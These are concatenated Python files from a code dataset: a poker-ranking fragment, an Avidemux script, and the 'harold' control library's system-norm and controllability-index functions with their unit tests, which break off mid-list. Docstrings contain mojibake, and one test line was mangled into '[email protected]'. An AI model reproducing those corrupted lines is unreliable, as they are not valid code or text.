if rank > winning_hand_rank:
winning_hand_rank = rank
player_hand_rank = self.rank_hand(Merge(self.player_hand, self.community_hand))
record['result'] = 1
if winning_hand_rank < player_hand_rank:
record['result'] = 0
return records
``` |
{
"source": "josephcrosmanplays532/Wrapper-Offline-1.2.3-",
"score": 3
} |
#### File: autoScripts/lib/ADM_imageInfo.py
```python
import ADM_image
# Recompute dest image source/dest
# Taking aspect ratio into account
# Ported from js mean (c) 2011
#
aspectRatio=[
(1.,0.888888,1.185185), # NTSC 1:1 4:3 16:9
(1.,1.066667,1.422222), # PAL 1:1 4:3 16:9
(1.,0.888888,1.185185), # FILM 1:1 4:3 16:9
]
fps_predef=[ 29970, 25000, 23976]
def get_video_format(desc):
adm=Avidemux()
##########################
# Compute resize...
##########################
source=ADM_image.image()
fps=adm.getFps1000()
fmt=source.getFormat(fps)
print("Fps : "+str(fps))
print("Format : "+str(fmt))
if(fmt==ADM_image.FMT_UNKNOWN):
return None
desc="NTSC"
if(fmt==ADM_image.FMT_FILM):
desc="FILM"
if(fmt==ADM_image.FMT_PAL):
desc="PAL"
print("Format : "+str(desc))
return fmt
``` |
{
"source": "josephcslater/harold",
"score": 3
} |
#### File: harold/harold/_system_props.py
```python
import numpy as np
from numpy import count_nonzero, block
from numpy.linalg.linalg import (_assertRank2, _assertNdSquareness,
_assertNoEmpty2d, _makearray)
from scipy.linalg import solve, norm, eigvals, qr
from ._frequency_domain import frequency_response
from ._classes import Transfer, transfer_to_state
from ._solvers import lyapunov_eq_solver
from ._arg_utils import _check_for_state_or_transfer
__all__ = ['system_norm', 'controllability_indices']
def system_norm(G, p=np.inf, hinf_tol=1e-6, eig_tol=1e-8):
"""
Computes the system p-norm. Currently, no balancing is done on the
system, however in the future, a scaling of some sort will be introduced.
Currently, only Hโ and Hโ-norm are understood.
For Hโ-norm, the standard grammian definition via controllability grammian,
that can be found elsewhere is used.
Parameters
----------
G : {State,Transfer}
System for which the norm is computed
p : {int,np.inf}
The norm type; `np.inf` for Hโ- and `2` for H2-norm
hinf_tol: float
When the progress is below this tolerance the result is accepted
as converged.
eig_tol: float
The algorithm relies on checking the eigenvalues of the Hamiltonian
being on the imaginary axis or not. This value is the threshold
such that the absolute real value of the eigenvalues smaller than
this value will be accepted as pure imaginary eigenvalues.
Returns
-------
n : float
Resulting p-norm
Notes
-----
The Hโ norm is computed via the so-called BBBS algorithm ([1]_, [2]_).
.. [1] <NAME>, <NAME>: Fast Computation of Hโ-norm of
transfer function. System and Control Letters, 14, 1990.
:doi:`10.1016/0167-6911(90)90049-Z`
.. [2] <NAME> and <NAME>. A regularity result for the singular
values of a transfer matrix and a quadratically convergent
algorithm for computing its Lโ-norm. System and Control Letters,
1990. :doi:`10.1016/0167-6911(90)90037-U`
"""
# TODO: Try the corrections given in arXiv:1707.02497
_check_for_state_or_transfer(G)
if p not in (2, np.inf):
raise ValueError('The p in p-norm is not 2 or infinity. If you'
' tried the string \'inf\', use "np.inf" instead')
T = transfer_to_state(G) if isinstance(G, Transfer) else G
a, b, c, d = T.matrices
# 2- norm
if p == 2:
# Handle trivial infinities
if T._isgain:
# If nonzero -> infinity, if zero -> zero
if count_nonzero(T.d) > 0:
return np.Inf
else:
return 0.
if not T._isstable:
return np.Inf
if T.SamplingSet == 'R':
x = lyapunov_eq_solver(a.T, b @ b.T)
return np.sqrt(np.trace(c @ x @ c.T))
else:
x = lyapunov_eq_solver(a.T, b @ b.T, form='d')
return np.sqrt(np.trace(c @ x @ c.T + d @ d.T))
# โ-norm
elif np.isinf(p):
if not T._isstable:
return np.Inf
# Initial gamma0 guess
# Get the max of the largest svd of either
# - feedthrough matrix
# - G(iw) response at the pole with smallest damping
# - G(iw) at w = 0
# Formula (4.3) given in Bruinsma, Steinbuch Sys.Cont.Let. (1990)
if any(T.poles.imag):
J = [np.abs(x.imag/x.real/np.abs(x)) for x in T.poles]
ind = np.argmax(J)
low_damp_fr = np.abs(T.poles[ind])
else:
low_damp_fr = np.min(np.abs(T.poles))
f, w = frequency_response(T, w=[0, low_damp_fr], w_unit='rad/s',
output_unit='rad/s')
if T._isSISO:
lb = np.max(np.abs(f))
else:
# Only evaluated at two frequencies, 0 and wb
lb = np.max(norm(f, ord=2, axis=2))
# Finally
gamma_lb = np.max([lb, norm(d, ord=2)])
# Start a for loop with a definite end! Convergence is quartic!!
for x in range(51):
# (Step b1)
test_gamma = gamma_lb * (1 + 2*np.sqrt(np.spacing(1.)))
# (Step b2)
R = d.T @ d - test_gamma**2 * np.eye(d.shape[1])
S = d @ d.T - test_gamma**2 * np.eye(d.shape[0])
# TODO : Implement the result of Benner for the Hamiltonian later
mat = block([[a - b @ solve(R, d.T) @ c,
-test_gamma * b @ solve(R, b.T)],
[test_gamma * c.T @ solve(S, c),
-(a - b @ solve(R, d.T) @ c).T]])
eigs_of_H = eigvals(mat)
# (Step b3)
im_eigs = eigs_of_H[np.abs(eigs_of_H.real) <= eig_tol]
# If none left break
if im_eigs.size == 0:
gamma_ub = test_gamma
break
else:
# Take the ones with positive imag part
w_i = np.sort(np.unique(np.abs(im_eigs.imag)))
# Evaluate the cubic interpolant
m_i = (w_i[1:] + w_i[:-1]) / 2
f, w = frequency_response(T, w=m_i, w_unit='rad/s',
output_unit='rad/s')
if T._isSISO:
gamma_lb = np.max(np.abs(f))
else:
gamma_lb = np.max(norm(f, ord=2, axis=2))
return (gamma_lb + gamma_ub)/2
def controllability_indices(A, B, tol=None):
"""Computes the controllability indices for a controllable pair (A, B)
Controllability indices are defined as the maximum number of independent
columns per input column of B in the following sense: consider the Kalman
controllability matrix (widely known as Krylov sequence) ::
C = [B, AB, ..., A^(n-1)B]
We start testing (starting from the left-most) every column of this matrix
whether it is a linear combination of the previous columns. Obviously,
since C is (n x nm), there are many ways to pick a linearly independent
subset. We select a version from [1]_. If a new column is dependent
we delete that column and keep doing this until we are left with a
full-rank square matrix (this is guaranteed if (A, B) is controllable).
Then at some point, we are necessarily left with columns that are obtained
from different input columns ::
ฬ
C = [bโ,bโ,bโ...,Abโ,Abโ,...,Aยฒbโ,Aยฒbโ,...,Aโฝแตโปยนโพbโ,...]
For example, it seems like Abโ is deleted due to dependence on the previous
columns to its left. It can be shown that the higher powers will also be
dependent and can be removed too. By reordering these columns, we combine
the terms that involve each bโฑผ ::
ฬ
C = [bโ,Abโ,Aยฒbโ,bโ,bโ,Abโ,Aยฒbโ,...,Aโฝแตโปยนโพbโ,...]
The controllability index associated with each input column is defined as
the number of columns per bโฑผ appearing in the resulting matrix. Here, 3
for first input 1 for second and so on.
If B is not full rank then the index will be returned as 0 as that column
bโฑผ will be dropped too.
Parameters
----------
A : ndarray
2D (n, n) real-valued array
B : ndarray
2D (n, m) real-valued array
tol : float
Tolerance value for the Arnoldi iteration to decide linear dependence.
By default it is `sqrt(eps)*nยฒ`
Returns
-------
ind : ndarray
1D array that holds the computed controllability indices. The sum of
the values add up to `n` if (A, B) is controllable.
Notes
-----
Though internally not used, this function can also be used as a
controllability/observability test by summing up the resulting indices and
comparing to `n`.
References
----------
.. [1] : <NAME>, "Linear Multivariable Control: A Geometric Approach",
3rd edition, 1985, Springer, ISBN:9780387960715
"""
a, _ = _makearray(A)
b, _ = _makearray(B)
_assertRank2(a, b)
_assertNoEmpty2d(a, b)
_assertNdSquareness(a)
n, m = b.shape
if a.shape[0] != b.shape[0]:
raise ValueError("A and B should have the same number of rows")
# FIXME: Tolerance is a bit arbitrary for now!!
tol = np.sqrt(np.spacing(1.))*n**2 if tol is None else tol
# Will be populated below
remaining_cols = np.arange(m)
indices = np.zeros(m, dtype=int)
# Get the orthonormal columns of b first
q, r, p = qr(b, mode='economic', pivoting=True)
rank_b = sum(np.abs(np.diag(r)) > max(m, n)*np.spacing(norm(b, 2)))
remaining_cols = remaining_cols[p][:rank_b].tolist()
q = q[:, :rank_b]
indices[remaining_cols] += 1
w = np.empty((n, 1), dtype=float)
# Start the iteration - at most n-1 spins
for k in range(1, n):
# prepare new A @ Q test vectors
q_bank = a @ q[:, -len(remaining_cols):]
for ind, col in enumerate(remaining_cols.copy()):
w[:] = q_bank[:, [ind]]
for reorthogonalization in range(2):
w -= ((q.T @ w).T * q).sum(axis=1, keepdims=True)
normw = norm(w)
if normw <= tol:
remaining_cols.remove(col)
continue
else:
q = np.append(q, w/normw, axis=1)
indices[col] += 1
if len(remaining_cols) == 0:
break
return indices
```
#### File: harold/tests/test_classes.py
```python
import numpy as np
from numpy.linalg import LinAlgError
from numpy.random import seed
from harold import (Transfer, State, e_i, haroldcompanion,
transmission_zeros, state_to_transfer, transfer_to_state,
random_state_model, concatenate_state_matrices)
from numpy.testing import (assert_,
assert_equal,
assert_array_equal,
assert_raises,
assert_almost_equal,
assert_array_almost_equal)
def test_concatenate_state_matrices():
G = State(1, 2, 3, 4)
M = concatenate_state_matrices(G)
assert_array_equal(M, np.array([[1, 2], [3, 4]])) # 1
G = State(np.eye(4))
assert_array_equal(concatenate_state_matrices(G), np.eye(4))
def test_Transfer_Instantiations():
assert_raises(TypeError, Transfer)
# Double list is MIMO, num is SISO --> Static!
G = Transfer(1, [[1, 2, 1]])
assert_equal(len(G.num), 1)
assert_equal(len(G.num[0]), 3)
assert_equal(G.shape, (1, 3))
assert_(G._isgain)
G = Transfer(1, np.array([[2, 1, 1]]))
assert_(G._isSISO)
G = Transfer([[1]], [1, 2, 1])
assert_(G._isSISO)
assert_equal(G.num.shape, (1, 1))
assert_equal(G.den.shape, (1, 3))
G = Transfer([[1, 2]], [1, 2, 1])
assert_(not G._isSISO)
assert_equal(len(G.num[0]), 2)
assert_equal(len(G.den[0]), 2)
assert_equal(G.shape, (1, 2))
num = [[np.array([1, 2]), 1], [np.array([1, 2]), 0]]
den = [1, 4, 4]
G = Transfer(num, den)
assert_equal(len(G.num), 2)
assert_equal(len(G.num[0]), 2)
assert_equal(G.shape, (2, 2))
G = Transfer(1)
assert_(G._isSISO)
assert_equal(G.num, np.array([[1]]))
assert_equal(G.den, np.array([[1]]))
G = Transfer(None, 1)
assert_(G._isSISO)
assert_equal(G.num, np.array([[1]]))
assert_equal(G.den, np.array([[1]]))
G = Transfer(np.random.rand(3, 2))
assert_(not G._isSISO)
assert_equal(G.shape, (3, 2))
assert_equal(G.poles.size, 0)
assert_raises(IndexError, Transfer, np.ones((3, 2)), [[[1, 2], [1, 1]]])
def test_Transfer_property():
G = Transfer([1, 1], [1, 1, 1])
assert G.DiscretizedWith is None
G.SamplingPeriod = 0.1
G.DiscretizedWith = 'zoh'
assert G.DiscretizedWith == 'zoh'
G = Transfer([1, 1], [1, 1, 1])
G.num = [1, 2, 1]
with assert_raises(IndexError):
G.num = [[1, [1, 2]]]
G.den = [1, 2, 1]
with assert_raises(IndexError):
G.den = [[[1, 2, 3], [1, 2, 5]]]
with assert_raises(ValueError):
G.DiscretizedWith = 'zoh'
with assert_raises(ValueError):
G.DiscretizationMatrix = 1.
G = Transfer([0.1, 0.1, -0.5], [1, 1.3, 0.43], 0.1)
with assert_raises(ValueError):
G.DiscretizedWith = 'some dummy method'
G.DiscretizedWith = 'lft'
G.DiscretizationMatrix = np.array([[1, 2], [1.5, 5.]]) # dummy array
assert_array_equal(G.DiscretizationMatrix, np.array([[1, 2], [1.5, 5.]]))
with assert_raises(ValueError):
G.DiscretizationMatrix = [1., 1.]
with assert_raises(ValueError):
G.PrewarpFrequency = 200
G = Transfer([1, 1], [1, 1, 1], dt=0.1)
G.DiscretizedWith = 'tustin'
G.PrewarpFrequency = 0.02
assert G.PrewarpFrequency == 0.02
def test_Transfer_to_array():
G = Transfer(1, [1, 1])
H = Transfer(2, 10)
with assert_raises(ValueError):
G.to_array()
assert_equal(H.to_array(), np.array([[.2]]))
assert_equal(Transfer(np.arange(9, 90, 9).reshape(3, 3),
9*np.ones((3, 3))).to_array(),
np.arange(1, 10).reshape(3, 3))
def test_Transfer_algebra_mul_rmul_dt():
G = Transfer(1, [1, 2], dt=0.1)
F = Transfer(1, [1, 3])
with assert_raises(ValueError):
F*G
def test_Transfer_algebra_truediv_rtruediv():
G = Transfer(1, [1, 2])
F = G/0.5
assert_equal(F.num, np.array([[2.]]))
assert_equal(F.den, np.array([[1., 2.]]))
# invert a nonproper system
with assert_raises(ValueError):
G/G
# invert a singular system
with assert_raises(LinAlgError):
1 / (np.ones((2, 2))*(1+G))
with assert_raises(ValueError):
G/3j
# invert an invertible system
J = 1 / (np.eye(2) * G + np.array([[1, 2], [3, 4]]))
nn, dd = J.polynomials
nnact = np.array([[x[0].tolist() for x in y] for y in nn])
ddact = np.array([[x[0].tolist() for x in y] for y in dd])
nndes = np.array([[[-2., -8.5, -9.], [1., 4., 4.]],
[[1.5, 6., 6.], [-0.5, -2.5, -3.]]])
dddes = np.array([[[1., 1.5, -1.5], [1., 1.5, -1.5]],
[[1., 1.5, -1.5], [1., 1.5, -1.5]]])
assert_array_almost_equal(nnact, nndes)
assert_array_almost_equal(ddact, dddes)
G = Transfer(np.eye(3)*0.5)
assert_array_almost_equal((1 / G).to_array(), np.eye(3)*2)
def test_Transfer_algebra_mul_rmul_scalar_array():
NUM = [[[12], [-18]], [[6], [-24]]]
DEN = [[[14, 1.], [21., 1.]], [[7, 1.], [49, 1.]]]
G = Transfer(NUM, DEN)
for H in (np.eye(2)*G, G*np.eye(2)):
assert_equal(H.num[0][1], np.array([[0.]]))
assert_equal(H.num[1][0], np.array([[0.]]))
assert_equal(H.den[0][1], np.array([[1.]]))
assert_equal(H.den[1][0], np.array([[1.]]))
assert_equal(H.num[0][0], G.num[0][0])
assert_equal(H.num[1][1], G.num[1][1])
assert_equal(H.den[0][0], G.den[0][0])
assert_equal(H.den[1][1], G.den[1][1])
H = 1/6*G
assert_equal(float(H.num[0][0]), 2.)
assert_equal(float(H.num[0][1]), -3.)
assert_equal(float(H.num[1][0]), 1.)
assert_equal(float(H.num[1][1]), -4.)
G = Transfer([[1, 2]], [1, 1])
H = np.array([2, 1]) * G
assert_array_equal(H.num[0][0], np.array([[2.]]))
assert_array_equal(H.num[0][1], np.array([[2.]]))
H = np.array([2, 0]) * G
assert_array_equal(H.num[0][1], np.array([[0.]]))
assert_array_equal(H.den[0][1], np.array([[1.]]))
H = np.array([[2]]) * G
assert_array_equal(H.num[0][0], np.array([[2.]]))
assert_array_equal(H.num[0][1], np.array([[4.]]))
with assert_raises(ValueError):
H = np.array([2+1j, 1]) * G
J = H*0.
assert_array_equal(J.num[0][0], np.array([[0.]]))
assert_array_equal(J.num[0][1], np.array([[0.]]))
assert_array_equal(J.den[0][0], np.array([[1.]]))
assert_array_equal(J.den[0][1], np.array([[1.]]))
G = Transfer(1, [1, 1])
H = G*0.
assert_array_equal(H.num, np.array([[0.]]))
assert_array_equal(H.den, np.array([[1.]]))
def test_Transfer_algebra_mul_rmul_siso_mimo():
F = Transfer(2, [1, 1])
H = Transfer(np.arange(1, 5).reshape(2, 2), [1, 2])
K = Transfer([1, 3], [1, 0, 1])
FK_num, FK_den = (F*K).polynomials
assert_equal(FK_num, np.array([[2, 6]]))
assert_equal(FK_den, np.array([[1, 1, 1, 1]]))
for J in (F*H, H*F):
for x in range(2):
for y in range(2):
assert_equal(J.num[x][y], np.array([[(1+y+2*x)*2]]))
assert_equal(J.den[x][y], np.array([[1, 3, 2]]))
H = Transfer([1, 2], [1, 2, 3])*np.arange(1, 5).reshape(2, 2)
HH = H*H
for x in range(4):
assert_equal(sum(HH.den, [])[x], np.array([[1., 4., 10., 12., 9.]]))
assert_equal(sum(HH.num, [])[x], (x+1)**2 * np.array([[1., 4., 4.]]))
F = Transfer(1, [1, 1])
H = State(1, 2, 3, 4, 0.1)
with assert_raises(ValueError):
F*H
with assert_raises(ValueError):
F*'string'
def test_Transfer_algebra_matmul_rmatmul():
G = Transfer([[1, [1, 1]]], [[[1, 2, 1], [1, 1]]])
H = Transfer([[[1, 3]], [1]], [1, 2, 1])
F = G @ H
assert_almost_equal(F.num, np.array([[1, 3, 4]]))
assert_almost_equal(F.den, np.array([[1, 4, 6, 4, 1]]))
F = H @ G
assert_almost_equal(F.num[0][0], np.array([[1, 3]]))
assert_almost_equal(F.num[0][1], np.array([[1, 4, 3]]))
assert_almost_equal(F.num[1][0], np.array([[1]]))
assert_almost_equal(F.num[1][1], np.array([[1, 1]]))
assert_almost_equal(F.den[0][0], np.array([[1, 4, 6, 4, 1]]))
assert_almost_equal(F.den[0][1], np.array([[1, 3, 3, 1]]))
assert_almost_equal(F.den[1][0], F.den[0][0])
assert_almost_equal(F.den[1][1], F.den[0][1])
F = Transfer(2) @ Transfer(np.eye(2)) @ Transfer(2)
assert_equal(F.to_array(), 4*np.eye(2))
G = Transfer([[1, 2]], [1, 1])
H = np.array([[2], [1]]) @ G
assert_array_equal(H.num[0][0], np.array([[2.]]))
assert_array_equal(H.num[0][1], np.array([[4.]]))
assert_array_equal(H.num[1][0], np.array([[1.]]))
assert_array_equal(H.num[1][1], np.array([[2.]]))
G = Transfer([[1, 2]], [1, 1])
H = G @ np.array([[2], [1]])
assert H._isSISO
assert_array_almost_equal(H.num, np.array([[4.]]))
assert_array_almost_equal(H.den, np.array([[1., 1.]]))
H = np.array([[2]]) @ G
assert_array_equal(H.num[0][0], np.array([[2.]]))
assert_array_equal(H.num[0][1], np.array([[4.]]))
with assert_raises(ValueError):
H = np.array([2+1j, 1]) * G
J = H*0.
assert_array_equal(J.num[0][0], np.array([[0.]]))
assert_array_equal(J.num[0][1], np.array([[0.]]))
assert_array_equal(J.den[0][0], np.array([[1.]]))
assert_array_equal(J.den[0][1], np.array([[1.]]))
G = Transfer(1, [1, 1])
H = G*0.
assert_array_equal(H.num, np.array([[0.]]))
assert_array_equal(H.den, np.array([[1.]]))
def test_Transfer_algebra_neg_add_radd():
G = Transfer(1, [1, 2, 1])
assert_equal(-(G.num), (-G).num)
H = Transfer([1, 1], [1, 0.2], 0.1)
with assert_raises(ValueError):
G + H
G, H = Transfer(1), Transfer(2)
assert_equal((G+H).num, np.array([[3.]]))
G, H = Transfer(1), State(5)
assert isinstance(G+H, State)
G = Transfer(1, [1, 1])
assert_equal((G+(-G)).num, np.array([[0.]]))
assert_almost_equal((G + 5).num, np.array([[5, 6]]))
G = Transfer([[1, 2]], [1, 1])
H = G + np.array([[3, 4]])
assert_equal(H.num[0][0], np.array([[3., 4.]]))
with assert_raises(IndexError):
G + np.array([3, 4])
G = Transfer([[1, [1, 1]]], [[[1, 2, 1], [1, 1]]])
F = - G
assert_almost_equal(G.num[0][0], -F.num[0][0])
assert_almost_equal(G.num[0][1], -F.num[0][1])
H = F + G
for x in range(2):
assert_array_equal(H.num[0][x], np.array([[0]]))
assert_array_equal(H.den[0][x], np.array([[1]]))
G = Transfer(1, [1, 2, 3])
F = 5 + G
assert_almost_equal(F.num, np.array([[5, 10, 16.]]))
assert_almost_equal(F.den, G.den)
F = G + 3
assert_almost_equal(F.num, np.array([[3, 6, 10.]]))
assert_almost_equal(F.den, G.den)
F = F * 5
assert_almost_equal(F.num, np.array([[15, 30, 50]]))
assert_almost_equal(F.den, G.den)
F *= 0.4
assert_almost_equal(F.num, np.array([[6, 12, 20]]))
assert_almost_equal(F.den, G.den)
num1 = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
den1 = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1., 0, 0, 4]]]
num2 = [[[0, 0, 0, -1], [2.], [-1., -1.]],
[[1., 2.], [-1., -2.], [4.]]]
den2 = [[[-1.], [1., 2., 3.], [-1., -1.]],
[[-4., -3., 2.], [0., 1.], [1., 0.]]]
G = Transfer(num1, den1)
assert_raises(ValueError, Transfer, num2, den2)
den2[1][1] = [2, -1, -1]
F = Transfer(num2, den2)
H = G + F
# Flatten list of lists via sum( , []) trick
Hnum = [np.array([[-1., 5/3, 10/3]]),
np.array([[5., 6., 9.]]),
np.array([[1., 0.5, -0.5]]),
np.array([[1., 3., 0.75, -0.5]]),
np.array([[3., -2.]]),
np.array([[5., -4., 3., 16.]])
]
Hden = [np.array([[1., -2/3, -4/3]]),
np.array([[1., 2., 3., 0., 0.]]),
np.array([[1., 0.5, -0.5]]),
np.array([[1., 0.75, -0.5, 0., 0.]]),
np.array([[1., -0.5, -0.5]]),
np.array([[1., 0., 0., 4., 0.]])
]
Hnum_computed = sum(H.num, [])
Hden_computed = sum(H.den, [])
for x in range(np.multiply(*H.shape)):
assert_almost_equal(Hnum[x], Hnum_computed[x])
assert_almost_equal(Hden[x], Hden_computed[x])
def test_Transfer_slicing():
Hind = [(1, 5), (4, 1),
(4, 5), (1, 1),
(2, 5), (4, 2),
(2, 5), (4, 2),
(1, 2), (2, 1),
(2, 5), (4, 3)]
np.random.seed(1234)
H = state_to_transfer(State(np.random.rand(3, 3),
np.random.rand(3, 5),
np.random.rand(4, 3)))
F = Transfer(np.random.rand(4, 5))
for s, sind in ((H, Hind), (F, Hind)):
for ind, x in enumerate([s[1, :], s[:, 1],
s[:, :], s[0, 0],
s[1:3, :], s[:, 1:3],
s[[1, 2], :], s[:, [1, 2]],
s[2, [1, 2]], s[[1, 2], 2],
s[::2, :], s[:, ::2]]):
assert_equal(x.shape, sind[ind])
assert_raises(ValueError, H.__setitem__)
def test_State_Instantiations():
assert_raises(TypeError, State)
G = State(5)
assert_(G.a.size == 0)
assert_(G._isSISO)
assert_(G._isgain)
assert_equal(G.d, np.array([[5.]]))
G = State(np.eye(2))
assert_equal(G.shape, (2, 2))
assert_(G._isgain)
assert_(not G._isSISO)
# Wrong sized A, B, C, D
assert_raises(ValueError, State, np.ones((3, 2)), [[1], [2]], [1, 2])
assert_raises(ValueError, State, np.eye(2), [[1], [2], [3]], [1, 2])
assert_raises(ValueError, State, np.eye(2), [[1], [2]], [1, 2, 3])
assert_raises(ValueError, State, np.eye(2), [[1], [2]], [1, 2], [0, 0])
def test_State_to_array():
G = State(1, 1, 1)
H = State(5)
with assert_raises(ValueError):
G.to_array()
assert_equal(H.to_array(), np.array([[5]]))
H = State(np.ones((4, 4)))
assert_equal(H.to_array(), np.ones((4, 4)))
def test_State_algebra_mul_rmul_dt():
G = State(1, 2, 3, 4, dt=0.1)
F = State(4, 3, 2, 1)
with assert_raises(ValueError):
F*G
with assert_raises(ValueError):
G*F
def test_State_algebra_truediv_rtruediv():
G = State(1, 2, 3, 4)
F = G/0.5
assert_equal(F.b, np.array([[4.]]))
assert_equal(F.d, np.array([[8.]]))
G.d = 0.
with assert_raises(LinAlgError):
G/G
with assert_raises(ValueError):
G/3j
G.d = 4
# nonminimal but acceptable
H = G / G
ha, hb, hc, hd = H.matrices
assert_array_almost_equal(ha, [[1, -1.5], [0, -0.5]])
assert_array_almost_equal(hb, [[0.5], [0.5]])
assert_array_almost_equal(hc, [[3, -3]])
assert_array_almost_equal(hd, [[1]])
G = State(np.eye(3)*0.5)
assert_array_almost_equal((1 / G).to_array(), np.eye(3)*2)
def test_State_algebra_mul_rmul_scalar_array():
G = State(np.diag([-1, -2]), [[1, 2], [3, 4]], np.eye(2))
F = G*np.eye(2)
Fm = [email protected](2)
assert_equal(concatenate_state_matrices(F), concatenate_state_matrices(Fm))
F = np.eye(2)*G
Fm = np.eye(2)@G
assert_equal(concatenate_state_matrices(F), concatenate_state_matrices(Fm))
H = 1/2*G
assert_equal(H.c, 0.5*G.c)
def test_State_matmul_rmatmul_ndarray():
H = State([[-5, -2], [1, 0]], [[2], [0]], [3, 1], 1)
J1 = np.array([[-5., -2., 0., 0., 0., 0., 2., 4., 6., 8.],
[1., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., -5., -2., 0., 0., 10., 12., 14., 16.],
[0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., -5., -2., 18., 20., 22., 24.],
[0., 0., 0., 0., 1., 0., 0., 0., 0., 0.],
[3., 1., 0., 0., 0., 0., 1., 2., 3., 4.],
[0., 0., 3., 1., 0., 0., 5., 6., 7., 8.],
[0., 0., 0., 0., 3., 1., 9., 10., 11., 12.]])
J2 = np.array([[-5., -2., 0., 0., 0., 0., 2., 0., 0.],
[1., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., -5., -2., 0., 0., 0., 2., 0.],
[0., 0., 1., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., -5., -2., 0., 0., 2.],
[0., 0., 0., 0., 1., 0., 0., 0., 0.],
[3., 1., 6., 2., 9., 3., 1., 2., 3.],
[12., 4., 15., 5., 18., 6., 4., 5., 6.],
[21., 7., 24., 8., 27., 9., 7., 8., 9.],
[30., 10., 33., 11., 36., 12., 10., 11., 12.]])
mat = np.arange(1, 13).reshape(3, 4)
Fm = concatenate_state_matrices(mat @ H)
assert_array_almost_equal(J1, Fm)
Fm = concatenate_state_matrices(H @ mat)
assert_array_almost_equal(J1, Fm)
mat = np.arange(1, 13).reshape(4, 3)
Fm = concatenate_state_matrices(mat @ H)
assert_array_almost_equal(J2, Fm)
Fm = concatenate_state_matrices(H @ mat)
assert_array_almost_equal(J2, Fm)
G, H = random_state_model(2, 2, 2), random_state_model(2, 3, 3)
with assert_raises(ValueError):
G @ H
# Scalars
G = random_state_model(1)
H = 0. @ G
assert H._isgain
H = 1. @ G
assert_almost_equal(concatenate_state_matrices(G),
concatenate_state_matrices(H))
# static gain mults
G = random_state_model(0, 4, 5)
H = random_state_model(0, 5, 4)
assert (G@H)._isgain
assert_equal((G@H).shape, (4, 4))
H = random_state_model(0, 3, 3)
with assert_raises(ValueError):
G @ H
G = State(1.)
H = random_state_model(1, 2, 2)
assert_almost_equal(concatenate_state_matrices(G @ H),
concatenate_state_matrices(H @ G))
G = random_state_model(1, 4, 5)
H = random_state_model(1, 4, 5)
with assert_raises(ValueError):
G @ H
def test_State_algebra_mul_rmul_mimo_siso():
sta_siso = State(5)
sta_mimo = State(2.0*np.eye(3))
dyn_siso = State(haroldcompanion([1, 3, 3, 1]), e_i(3, -1), e_i(3, 1).T)
dyn_mimo = State(haroldcompanion([1, 3, 3, 1]), e_i(3, [1, 2]), np.eye(3))
dyn_mimo_sq = State(haroldcompanion([1, 3, 3, 1]), np.eye(3), np.eye(3))
G = dyn_siso * dyn_mimo
J = np.array([[0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0., 0., 0., 0.],
[-1., -3., -3., 0., 0., 0., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0.],
[0., 0., 0., -1., -3., -3., 0., 0., 0., 1., 0.],
[0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0.],
[0., 0., 0., 0., 0., 0., -1., -3., -3., 0., 1.],
[1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0.]])
assert_array_almost_equal(concatenate_state_matrices(G), J)
G = dyn_mimo * dyn_siso
assert_array_almost_equal(concatenate_state_matrices(G), J)
G = dyn_mimo * sta_siso
assert_array_almost_equal(G.b, 5*dyn_mimo.b)
assert_array_almost_equal(G.d, 5*dyn_mimo.d)
assert_raises(ValueError, sta_mimo.__add__, dyn_mimo)
F = sta_mimo @ dyn_mimo
J = np.array([[0., 1., 0., 0., 0.],
[0., 0., 1., 1., 0.],
[-1., -3., -3., 0., 1.],
[2., 0., 0., 0., 0.],
[0., 2., 0., 0., 0.],
[0., 0., 2., 0., 0.]])
assert_array_almost_equal(concatenate_state_matrices(F), J)
assert_almost_equal((dyn_mimo_sq + sta_mimo).d, 2*np.eye(3))
def test_State_algebra_add_radd():
sta_siso = State(5)
sta_mimo = State(2.0*np.eye(3))
dyn_siso = State(haroldcompanion([1, 3, 3, 1]), e_i(3, -1), e_i(3, 1).T)
dyn_mimo = State(haroldcompanion([1, 3, 3, 1]), e_i(3, [1, 2]), np.eye(3))
dyn_mimo_sq = State(haroldcompanion([1, 3, 3, 1]), np.eye(3), np.eye(3))
G = dyn_mimo + sta_siso
assert_array_almost_equal(G.d, sta_siso.to_array()*np.ones(dyn_mimo.shape))
assert_raises(ValueError, dyn_mimo.__add__, sta_mimo)
G = dyn_mimo_sq + sta_mimo
assert_array_almost_equal(G.d, 2.*np.eye(3))
G = dyn_mimo + dyn_siso
J = np.array([[0., 1., 0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0., 0., 1., 0.],
[-1., -3., -3., 0., 0., 0., 0., 1.],
[0., 0., 0., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0., 1., 0., 0.],
[0., 0., 0., -1., -3., -3., 1., 1.],
[1., 0., 0., 0., 1., 0., 0., 0.],
[0., 1., 0., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.]])
assert_array_almost_equal(concatenate_state_matrices(G), J)
assert_raises(ValueError, dyn_mimo.__add__, dyn_mimo_sq)
assert_raises(ValueError, dyn_mimo.__sub__, dyn_mimo_sq)
assert_raises(ValueError, dyn_mimo.__radd__, dyn_mimo_sq)
assert_raises(ValueError, dyn_mimo.__rsub__, dyn_mimo_sq)
def test_State_slicing():
F = State(1, 2, 3, 4)
F0 = F[0, 0]
assert_equal(concatenate_state_matrices(F), concatenate_state_matrices(F0))
F = State(np.random.rand(4, 4))
H = State(F.d, np.random.rand(4, 3), np.random.rand(5, 4))
Hind = [(1, 3), (5, 1),
(5, 3), (1, 1),
(2, 3), (5, 2),
(2, 3), (5, 2),
(1, 2), (2, 1),
